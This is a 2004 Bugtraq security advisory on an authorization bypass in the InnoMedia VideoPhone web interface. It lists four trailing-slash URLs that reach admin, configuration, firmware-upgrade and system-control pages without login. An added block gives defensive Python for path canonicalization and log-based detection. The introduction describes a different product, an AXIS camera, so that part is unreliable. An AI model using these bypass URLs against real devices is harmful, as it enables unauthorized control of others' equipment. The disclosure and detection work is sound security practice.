Message-ID: <000501c3fdf6$478b9ce0$0b3016ac@fucku>
Date: Sat, 28 Feb 2004 14:27:49 +0200
From: "Rafel Ivgi, The-Insider" <theinsider@....net.il>
To: "bugtraq" <bugtraq@...urityfocus.com>
Cc: "SecurITeam News" <news@...uriteam.com>,
"securitytracker" <bugs@...uritytracker.com>
Subject: InnoMedia VideoPhone Authorization Bypass
#######################################################################
Application: InnoMedia VideoPhone
Server: GoAhead-Webs
Vendors: InnoMedia Pte Ltd
GoAhead Ltd
http://www.innomedia.com/
http://www.goahead.com/
Versions: au75200xvi04010x
Platforms: Windows
Bug: Authorization Bypass
Risk: High
Exploitation: remote with browser
Date: 25 Dec 2003
Author: Rafel Ivgi, The-Insider
e-mail: the_insider@...l.com
web: http://theinsider.deep-ice.com
#######################################################################
1) Introduction
2) Bugs
3) The Code
#######################################################################
===============
1) Introduction
===============
The AXIS 2100 Network Camera offers crisp, quality images and streaming video from anywhere on your network. It lets you keep a close eye on the world around you, or show your part of it through the Web.
With a built-in high performance Web server, no PC is required. The network camera can operate as a standalone or be placed wherever there is a LAN or Internet connection, or an available modem.
#######################################################################
======
2) Bug
======
Browsing the server normally at
http://<host>/
shows some information about the server.
The server's menu appears on the left side and contains a few links to protected files, which set up the server's settings/configuration.
Referring to any of the menu's "protected" links, such as:
http://<host>/videophone_admindetail.asp
pops up a "Basic Authorization" request.
This authorization can be easily bypassed by referring to the same file as a folder:
http://<host>/videophone_admindetail.asp/
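As an added example (not part of the original advisory), the code below contrasts an exact-match authorization check, which is the pattern this trailing-slash bypass defeats, with one that canonicalizes the request path before deciding, and scans constructed access-log lines for requests that reach a protected page in non-canonical form. The PROTECTED set, the function names and the sample log are assumptions for the example; the real GoAhead configuration is not shown on this page.

```python
import posixpath
from urllib.parse import unquote

# Pages the advisory lists as protected; the real server configuration
# is not shown, so this set is an assumption for the example.
PROTECTED = {
    "/videophone_admindetail.asp",
    "/videophone_syscfg.asp",
    "/videophone_upgrade.asp",
    "/videophone_sysctrl.asp",
}

def naive_requires_auth(raw_target: str) -> bool:
    """Exact match on the raw target: the check the advisory shows being bypassed."""
    return raw_target in PROTECTED

def canonicalize(raw_target: str) -> str:
    """Drop the query, decode percent-escapes, collapse '//' and dot-segments,
    strip a trailing '/', and lowercase (assumes a case-insensitive Windows backend)."""
    path = unquote(raw_target.split("?", 1)[0])
    path = "/" + path.lstrip("/")  # posixpath.normpath would keep a leading '//'
    return posixpath.normpath(path).lower()

def hardened_requires_auth(raw_target: str) -> bool:
    """Decide on the canonical path, so '/x.asp/' is treated exactly like '/x.asp'."""
    return canonicalize(raw_target) in PROTECTED

def flag_bypass_attempts(log_lines):
    """Return targets from common-log-format lines that resolve to a protected
    page but were not written in canonical form (what the trailing-slash trick looks like)."""
    hits = []
    for line in log_lines:
        parts = line.split('"')
        if len(parts) < 3:
            continue
        fields = parts[1].split()  # e.g. ['GET', '/path', 'HTTP/1.0']
        if len(fields) < 2:
            continue
        raw = fields[1]
        canon = canonicalize(raw)
        if canon in PROTECTED and raw.split("?", 1)[0].lower() != canon:
            hits.append(raw)
    return hits

# Constructed sample access log; not output of any real device.
SAMPLE_LOG = [
    '10.0.0.5 - - [25/Dec/2003:10:00:01 +0200] "GET / HTTP/1.0" 200 1024',
    '10.0.0.5 - - [25/Dec/2003:10:00:02 +0200] "GET /videophone_admindetail.asp HTTP/1.0" 401 0',
    '10.0.0.5 - - [25/Dec/2003:10:00:03 +0200] "GET /videophone_admindetail.asp/ HTTP/1.0" 200 2048',
]
```

A 200 response on a flagged target, right after a 401 on the canonical form, is the signature a defender should alert on.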
#######################################################################
===========
3) The Code
===========
http://<host>/videophone_admindetail.asp/
http://<host>/videophone_syscfg.asp/
http://<host>/videophone_upgrade.asp/
http://<host>/videophone_sysctrl.asp/
#######################################################################
---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com
"Things that are unlikeable, are NOT impossible."